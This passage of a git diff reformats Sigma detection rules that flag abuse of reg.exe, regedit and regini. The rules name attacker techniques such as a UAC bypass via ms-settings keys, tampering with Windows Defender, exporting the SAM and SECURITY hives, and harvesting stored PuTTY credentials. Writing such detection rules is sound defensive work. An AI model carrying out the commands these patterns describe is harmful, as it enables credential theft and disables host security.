EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - '/ve ' - /d selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - reg - add - hkcu\software\classes\ms-settings\shell\open\command - /v - DelegateExecute selection_3: - CommandLine|contains|all: + CommandLine|contains|all: - reg - delete - hkcu\software\classes\ms-settings diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml index eec82dc81..063feee86 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_query_registry.yml @@ -1,9 +1,7 @@ title: Potential Configuration And Service Reconnaissance Via Reg.EXE id: 970007b7-ce32-49d0-a4a4-fbef016950bd status: test -description: Detects the usage of "reg.exe" in order to query reconnaissance information - from the registry. Adversaries may interact with the Windows registry to gather - information about credentials, the system, configuration, and installed software. +description: Detects the usage of "reg.exe" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1012/T1012.md author: Timur Zinniatullin, oscd.community @@ -22,16 +20,16 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_flag: - CommandLine|contains: query + CommandLine|contains: query selection_key: - CommandLine|contains: + CommandLine|contains: - currentVersion\windows - winlogon\ - currentVersion\shellServiceObjectDelayLoad - - currentVersion\run + - currentVersion\run # Also covers the strings "RunOnce", "RunOnceEx" and "runServicesOnce" - currentVersion\policies\explorer\run - currentcontrolset\services condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml index 38ed46724..573a11e06 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_rdp_keys_tamper.yml @@ -1,9 +1,7 @@ title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE id: 0d5675be-bc88-4172-86d3-1e96a4476536 status: test -description: Detects the execution of "reg.exe" for enabling/disabling the RDP service - on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' - values +description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values references: - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/ author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport @@ -23,20 +21,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_main_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_main_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - \CurrentControlSet\Control\Terminal Server - REG_DWORD - ' /f' selection_values_1: - CommandLine|contains|all: + CommandLine|contains|all: - Licensing Core - EnableConcurrentSessions selection_values_2: - CommandLine|contains: + CommandLine|contains: - WinStations\RDP-Tcp - MaxInstanceCount - fEnableWinStation diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml index fd870207e..9dfea592b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_screensaver.yml @@ -1,13 +1,9 @@ title: Suspicious ScreenSave Change by Reg.exe id: 0fc35fc3-efe6-4898-8a37-0b233339524f status: test -description: 'Adversaries may establish persistence by executing malicious content - triggered by user inactivity. - - Screensavers are programs that execute after a configurable time of user inactivity - and consist of Portable Executable (PE) files with a .scr file extension - - ' +description: | + Adversaries may establish persistence by executing malicious content triggered by user inactivity. + Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md - https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf @@ -27,29 +23,29 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_reg: Image|endswith: \reg.exe - CommandLine|contains: + CommandLine|contains: - HKEY_CURRENT_USER\Control Panel\Desktop - HKCU\Control Panel\Desktop - selection_option_1: - CommandLine|contains|all: + selection_option_1: # /force Active ScreenSaveActive + CommandLine|contains|all: - /v ScreenSaveActive - /t REG_SZ - /d 1 - /f - selection_option_2: - CommandLine|contains|all: + selection_option_2: # /force set ScreenSaveTimeout + CommandLine|contains|all: - /v ScreenSaveTimeout - /t REG_SZ - '/d ' - /f - selection_option_3: - CommandLine|contains|all: + selection_option_3: # /force set ScreenSaverIsSecure + CommandLine|contains|all: - /v ScreenSaverIsSecure - /t REG_SZ - /d 0 - /f - selection_option_4: - CommandLine|contains|all: + selection_option_4: # /force set a .scr + CommandLine|contains|all: - /v SCRNSAVE.EXE - /t REG_SZ - '/d ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml index b5244377e..cabe56c49 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_service_imagepath_change.yml @@ -1,16 +1,10 @@ title: Changing Existing Service ImagePath Value Via Reg.EXE id: 9b0b7ac3-6223-47aa-a3fd-e8f211e637db status: test -description: 'Adversaries may execute their own malicious payloads by hijacking the - Registry entries used by services. - - Adversaries may use flaws in the permissions for registry to redirect from the - originally specified executable to one that they control, in order to launch their - own code at Service start. - +description: | + Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. + Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe author: frack113 @@ -29,12 +23,12 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \reg.exe - CommandLine|contains|all: + CommandLine|contains|all: - 'add ' - SYSTEM\CurrentControlSet\Services\ - ' ImagePath ' selection_value: - CommandLine|contains: + CommandLine|contains: - ' /d ' - ' -d ' condition: process_creation and (all of selection*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml index 00851c7c7..f5880941b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_software_discovery.yml @@ -1,15 +1,13 @@ title: Detected Windows Software Discovery id: e13f668e-7f95-443d-98d2-1816a7648a7b related: - - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 - type: derived + - id: 2650dd1a-eb2a-412d-ac36-83f06c4f2282 + type: derived status: test -description: Adversaries may attempt to enumerate software for a variety of reasons, - such as figuring out what security measures are present or if the compromised - system has a version of software that is vulnerable. +description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md - - https://github.com/harleyQu1nn/AggressorScripts + - https://github.com/harleyQu1nn/AggressorScripts # AVQuery.cna author: Nikita Nazarov, oscd.community date: 2020/10/16 modified: 2022/10/09 @@ -25,8 +23,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - Image|endswith: \reg.exe - CommandLine|contains|all: + Image|endswith: \reg.exe # Example: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion + CommandLine|contains|all: - query - \software\ - /v diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml index eb38e559a..cad97da89 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_susp_paths.yml @@ -1,8 +1,7 @@ title: Reg Add Suspicious Paths id: b7e2a8d4-74bb-4b78-adc9-3f92af2d4829 status: test -description: Detects when an adversary uses the reg.exe utility to add or modify new - keys or subkeys +description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1562.001/T1562.001.md @@ -23,10 +22,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_reg: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_path: - CommandLine|contains: + CommandLine|contains: + # Add more suspicious registry locations below - \AppDataLow\Software\Microsoft\ - \Policies\Microsoft\Windows\OOBE - \Policies\Microsoft\Windows NT\CurrentVersion\Winlogon diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml index 8f65affe7..2446659f7 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_volsnap_disable.yml @@ -19,7 +19,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Services\VSS\Diag - /d Disabled condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml index b1e7ff496..5e12f8887 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_windows_defender_tamper.yml @@ -1,15 +1,12 @@ title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE id: 452bce90-6fb0-43cc-97a5-affc283139b3 status: experimental -description: Detects the usage of "reg.exe" to tamper with different Windows Defender - registry keys in order to disable some important features related to protection - and detection +description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection references: - https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/ - https://github.com/swagkarna/Defeat-Defender-V1.2.0 - https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2 -author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali - (Nextron Systems) +author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) date: 2022/03/22 modified: 2023/06/05 tags: @@ -24,18 +21,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_root_img: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_root_path: - CommandLine|contains: + CommandLine|contains: - SOFTWARE\Microsoft\Windows Defender\ - SOFTWARE\Policies\Microsoft\Windows Defender Security Center - SOFTWARE\Policies\Microsoft\Windows Defender\ selection_dword_0: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 0 - CommandLine|contains: + CommandLine|contains: - DisallowExploitProtectionOverride - EnableControlledFolderAccess - MpEnablePus @@ -44,10 +41,10 @@ detection: - SubmitSamplesConsent - TamperProtection selection_dword_1: - CommandLine|contains|all: + CommandLine|contains|all: - ' add ' - d 1 - CommandLine|contains: + CommandLine|contains: - DisableAntiSpyware - DisableAntiSpywareRealtimeProtection - DisableAntiVirus diff --git a/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml b/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml index f3c7fb734..e20d2f5d1 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_reg_write_protect_for_storage_disabled.yml @@ -1,9 +1,7 @@ title: Write Protect For Storage Disabled id: 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 status: test -description: Looks for changes to registry to disable any write-protect property for - storage devices. This could be a precursor to a ransomware attack and has been - an observed technique used by cypherpunk group. +description: Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group. author: Sreeman date: 2021/06/11 modified: 2023/12/15 @@ -19,11 +17,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \System\CurrentControlSet\Control - Write Protection - '0' - CommandLine|contains: + CommandLine|contains: - storage - storagedevicepolicies condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml index d87658c1d..f94696750 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_extension_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 related: - - id: cc368ed0-2411-45dc-a222-510ace303cb2 - type: derived + - id: cc368ed0-2411-45dc-a222-510ace303cb2 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - with an uncommon extension. +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities with an uncommon extension. references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -24,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - Image|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_extension: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially uncommon extensions - .dat - .gif - .jpeg diff --git a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml index b963b20c0..afd78afe6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regasm_regsvcs_uncommon_location_execution.yml @@ -1,11 +1,10 @@ title: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location id: cc368ed0-2411-45dc-a222-510ace303cb2 related: - - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 - type: derived + - id: e9f8f8cc-07cc-4e81-b724-f387db9175e4 + type: derived status: test -description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities - from a potentially suspicious location +description: Detects potentially suspicious execution of the Regasm/Regsvcs utilities from a potentially suspicious location references: - https://www.fortiguard.com/threat-signal-report/4718?s=09 - https://lolbas-project.github.io/lolbas/Binaries/Regasm/ @@ -25,19 +24,22 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \Regsvcs.exe - - \Regasm.exe - - OriginalFileName: - - RegSvcs.exe - - RegAsm.exe + - Image|endswith: + - \Regsvcs.exe + - \Regasm.exe + - OriginalFileName: + - RegSvcs.exe + - RegAsm.exe selection_dir: - CommandLine|contains: + CommandLine|contains: + # Note: Add more potentially suspicious directories - \AppData\Local\Temp\ - \Microsoft\Windows\Start Menu\Programs\Startup\ - \PerfLogs\ - \Users\Public\ - \Windows\Temp\ + # - '\Desktop\' + # - '\Downloads\' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml index bdedc72a8..f52c2c3bd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_critical_keys.yml @@ -1,8 +1,8 @@ title: Exports Critical Registry Keys To a File id: 82880171-b475-4201-b811-e9c826cd5eaa related: - - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a - type: similar + - id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a + type: similar status: test description: Detects the export of a crital Registry key to a file. references: @@ -23,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' selection_cli_2: - CommandLine|contains: + CommandLine|contains: - hklm - hkey_local_machine selection_cli_3: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml index b85564fd9..b6000a7f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_export_keys.yml @@ -1,8 +1,8 @@ title: Exports Registry Key To a File id: f0e53e89-8d22-46ea-9db5-9d4796ee2f8a related: - - id: 82880171-b475-4201-b811-e9c826cd5eaa - type: similar + - id: 82880171-b475-4201-b811-e9c826cd5eaa + type: similar status: test description: Detects the export of the target Registry key to a file. references: @@ -23,18 +23,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /E ' - ' -E ' - filter_1: - CommandLine|contains: + filter_1: # filters to avoid intersection with critical keys rule + CommandLine|contains: - hklm - hkey_local_machine filter_2: - CommandLine|endswith: + CommandLine|endswith: - \system - \sam - \security diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml index 24c13c16d..b4e267ec3 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From a File id: 73bba97f-a82d-42ce-b315-9182e76c57b1 related: - - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 - type: similar + - id: 0b80ade5-6997-4b1d-99a1-71701778ea61 + type: similar status: test description: Detects the import of the specified file to the registry with regedit.exe. references: @@ -23,15 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' /s ' - .reg filter_1: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' @@ -39,7 +39,7 @@ detection: - ' -a ' - ' -c ' filter_2: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # to avoid intersection with ADS rule condition: process_creation and (all of selection_* and not all of filter_*) fields: - ParentImage diff --git a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml index 3b5543090..e4b24e0bb 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regedit_import_keys_ads.yml @@ -1,8 +1,8 @@ title: Imports Registry Key From an ADS id: 0b80ade5-6997-4b1d-99a1-71701778ea61 related: - - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 - type: similar + - id: 73bba97f-a82d-42ce-b315-9182e76c57b1 + type: similar status: test description: Detects the import of a alternate datastream to the registry with regedit.exe. references: @@ -23,15 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regedit.exe - - OriginalFileName: REGEDIT.EXE + - Image|endswith: \regedit.exe + - OriginalFileName: REGEDIT.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ' /i ' - .reg - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] filter: - CommandLine|contains: + CommandLine|contains: - ' /e ' - ' /a ' - ' /c ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml b/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml index ba641aac6..f9e1fbdf9 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regini_ads.yml @@ -1,11 +1,10 @@ title: Suspicious Registry Modification From ADS Via Regini.EXE id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 related: - - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 - type: derived + - id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 + type: derived status: test -description: Detects the import of an alternate data stream with regini.exe, regini.exe - can be used to modify registry keys. +description: Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - Image|endswith: \regini.exe + - OriginalFileName: REGINI.EXE selection_re: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] condition: process_creation and (all of selection_*) fields: - ParentImage diff --git a/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml index b4dbde0b8..5f8be186f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_regini_execution.yml @@ -1,11 +1,10 @@ title: Registry Modification Via Regini.EXE id: 5f60740a-f57b-4e76-82a1-15b6ff2cb134 related: - - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 - type: derived + - id: 77946e79-97f1-45a2-84b4-f37b5c0d8682 + type: derived status: test -description: Detects the execution of regini.exe which can be used to modify registry - keys, the changes are imported from one or more text files. +description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. references: - https://lolbas-project.github.io/lolbas/Binaries/Regini/ - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -25,10 +24,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Image|endswith: \regini.exe - - OriginalFileName: REGINI.EXE + - Image|endswith: \regini.exe + - OriginalFileName: REGINI.EXE filter: - CommandLine|re: :[^ \\] + CommandLine|re: :[^ \\] # Covered in 77946e79-97f1-45a2-84b4-f37b5c0d8682 condition: process_creation and (selection and not filter) fields: - ParentImage diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml index ad4087f5b..9b5afeecd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_cimprovider_dll_load.yml @@ -21,7 +21,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \register-cimprovider.exe - CommandLine|contains|all: + CommandLine|contains|all: - -path - dll condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml index 9b08af355..38e31b606 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_enumeration_for_credentials_cli.yml @@ -1,11 +1,10 @@ title: Enumeration for 3rd Party Creds From CLI id: 87a476dc-0079-4583-a985-dee7a20a03de related: - - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 - type: derived + - id: e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 + type: derived status: test -description: Detects processes that query known 3rd party registry keys that holds - credentials via commandline +description: Detects processes that query known 3rd party registry keys that holds credentials via commandline references: - https://isc.sans.edu/diary/More+Data+Exfiltration/25698 - https://github.com/synacktiv/Radmin3-Password-Cracker/blob/acfc87393e4b7c06353973a14a6c7126a51f36ac/regkey.txt @@ -25,7 +24,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: # Add more paths as they are discovered - \Software\SimonTatham\PuTTY\Sessions - \Software\\SimonTatham\PuTTY\SshHostKeys\ - \Software\Mobatek\MobaXterm\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml index fc2e72ff4..af8d2f2d4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_ie_security_zone_protocol_defaults_downgrade.yml @@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols Via CLI id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 related: - - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 - type: similar + - id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 @@ -29,7 +25,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults - http - ' 0' diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml index 514f27d03..8d5064e8d 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_install_reg_debugger_backdoor.yml @@ -1,8 +1,7 @@ title: Suspicious Debugger Registration Cmdline id: ae215552-081e-44c7-805f-be16f975c8a2 status: test -description: Detects the registration of a debugger for a program that is available - in the logon screen (sticky key backdoor). +description: Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor). references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ @@ -22,9 +21,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: \CurrentVersion\Image File Execution Options\ + CommandLine|contains: \CurrentVersion\Image File Execution Options\ selection2: - CommandLine|contains: + CommandLine|contains: - sethc.exe - utilman.exe - osk.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml b/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml index fb421422f..33ae8b360 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_registry_logon_script.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via Logon Scripts - CommandLine id: 21d856f9-9281-4ded-9377-51a1a6e2a432 related: - - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 - type: derived + - id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 + type: derived status: experimental -description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" - for potential persistence +description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html author: Tom Ueltschi (@c_APT_ure) @@ -23,10 +22,9 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: 